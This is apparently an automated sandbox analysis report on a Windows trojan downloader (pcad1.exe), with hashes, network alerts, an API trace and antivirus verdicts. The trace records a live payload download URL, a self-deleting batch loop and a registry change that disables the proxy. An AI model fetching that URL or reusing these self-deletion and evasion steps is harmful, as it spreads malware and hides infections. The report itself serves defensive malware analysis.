Summary | ZeroBOX

pcad1.exe

Category: FILE
Machine: s1_win7_x6401
Started: June 25, 2021, 9:30 a.m.
Completed: June 25, 2021, 9:36 a.m.
Size: 540.0KB
Type: PE32 executable (GUI) Intel 80386, for MS Windows
MD5: c7af1f6747d5c61e97d556dec9aec85c
SHA256: 8b3a8268efe41220e294e6cad1055c46041d11c59ba37672709401aaefe5ae47
CRC32: 9C73451D
ssdeep: 12288:S2vcfzbyNUJO5FNg6QQCnoZeHn12N2+/tr4Kn2Ghn4:SxXyNU4gACosHed/tdn2GR
Yara
  • PE_Header_Zero - PE File Signature
  • Antivirus - Contains references to security software
  • OS_Processor_Check_Zero - OS Processor Check
  • IsPE32 - (no description)

IP Address Status Action
142.250.204.110 Active Moloch
15.164.192.168 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49202 -> 15.164.192.168:80 2022550 ET MALWARE Possible Malicious Macro DL EXE Feb 2016 A Network Trojan was detected
TCP 192.168.56.101:49202 -> 15.164.192.168:80 2022566 ET MALWARE Possible Malicious Macro EXE DL AlphaNumL A Network Trojan was detected
TCP 15.164.192.168:80 -> 192.168.56.101:49202 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation

Suricata TLS

No Suricata TLS

Time & API | Arguments | Status Return Repeated

WriteConsoleW | buffer: C:\Users\test22\AppData\Local\Temp> | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: del | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: /f /s /q "C:\Users\test22\AppData\Local\Temp\pcad1.exe" | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\pcad1.exe | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: C:\Users\test22\AppData\Local\Temp> | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: if | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: exist "C:\Users\test22\AppData\Local\Temp\pcad1.exe" | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: goto | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: Repeat | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: C:\Users\test22\AppData\Local\Temp> | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: del | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: /s /q "mkill.bat" | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\mkill.bat | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: The batch file cannot be found. | console_handle: 0x0000000b | 1 1 0
request: GET http://worldzone.kro.kr/pcad164.exe
resource: name RT_VERSION | language LANG_KOREAN | filetype data | sublanguage SUBLANG_KOREAN | offset 0x000850a0 | size 0x00000330
file: C:\Windows\pp.exe
file: C:\Users\test22\AppData\Local\Temp\mkill.bat
file: C:\Users\test22\AppData\Local\Temp\pcad1.exe
Time & API | Arguments | Status Return Repeated

CreateProcessInternalW
  thread_identifier: 0
  thread_handle: 0x00000000
  process_identifier: 0
  current_directory: C:\Windows
  filepath:
  track: 0
  command_line: C:\Windows\pp.exe
  filepath_r:
  stack_pivoted: 0
  creation_flags: 134217728 (CREATE_NO_WINDOW)
  inherit_handles: 0
  process_handle: 0x00000000
  Status/Return/Repeated: 0 0

ShellExecuteExW
  show_type: 0
  filepath_r: mkill.bat
  parameters:
  filepath: mkill.bat
  Status/Return/Repeated: 1 1 0
Time & API | Arguments | Status Return Repeated

recv
buffer: HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Sun, 13 Jun 2021 12:49:42 GMT Accept-Ranges: bytes ETag: "45c971945260d71:0" Server: Microsoft-IIS/8.5 Date: Fri, 25 Jun 2021 00:34:04 GMT Content-Length: 13973504 MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ö6”ú’Wú©’Wú©’Wú©/l©—Wú©›/y©Wú©›/o©˜Wú©µ‘—©•Wú©µ‘©‰Wú©’Wû©ØUú©›/p©”Wú©›/~©Wú©Œn©“Wú©›/k©“Wú©Rich’Wú©PEd†äþÅ`ð"  ššÑF@ÐÕ6”Õ@(˜ð xtÏP|D Õ°0 .text„˜š `.rdata¢° ž@@.dataðÀ*¨@À.pdata|DPFÒ@@.rsrcxtÏ vÏ@@.relocz¨ ÕªŽÔ@B
received: 1024
socket: 760
Status/Return/Repeated: 1 1024 0

file: C:\Users\test22\AppData\Local\Temp\mkill.bat
Time & API | Arguments | Status Return Repeated

RegSetValueExA
  key_handle: 0x0000025c
  regkey_r: ProxyEnable
  reg_type: 4 (REG_DWORD)
  value: 0
  regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
  Status/Return/Repeated: 1 0 0
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Variant.Barys.114250
FireEye Gen:Variant.Barys.114250
CAT-QuickHeal Trojandownloader.Generic
ALYac Gen:Variant.Barys.114250
Cylance Unsafe
Sangfor Riskware.Win32.Agent.ky
Alibaba TrojanDownloader:Win32/Generic.8ddbd1ad
Cybereason malicious.747d5c
Cyren W32/Trojan.KYFW-8002
Symantec ML.Attribute.HighConfidence
APEX Malicious
Avast Win32:Dh-A [Heur]
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Gen:Variant.Barys.114250
Ad-Aware Gen:Variant.Doina.17475
VIPRE Trojan.Win32.Generic!BT
TrendMicro TROJ_GEN.R002C0PFI21
McAfee-GW-Edition BehavesLike.Win32.Generic.hh
Emsisoft Gen:Variant.Barys.114250 (B)
Webroot W32.Malware.Gen
MAX malware (ai score=100)
Antiy-AVL Trojan/Generic.ASMalwS.3391D01
Kingsoft Win32.Troj.Generic_a.a.(kcloud)
Gridinsoft Trojan.Win32.Downloader.sa
Microsoft Trojan:Win32/Glupteba!ml
ZoneAlarm HEUR:Trojan-Downloader.Win32.Generic
GData Gen:Variant.Barys.114250
McAfee RDN/Generic Downloader.x
VBA32 BScope.Trojan.Downloader
Malwarebytes Malware.AI.4278874678
TrendMicro-HouseCall TROJ_GEN.R002C0PFI21
Tencent Win32.Trojan-downloader.Generic.Szvj
MaxSecure Trojan.Malware.1728101.susgen
Fortinet W32/PossibleThreat
BitDefenderTheta Gen:NN.ZexaE.34758.Hu0@ay0psgcO
AVG Win32:Dh-A [Heur]
Panda Trj/GdSda.A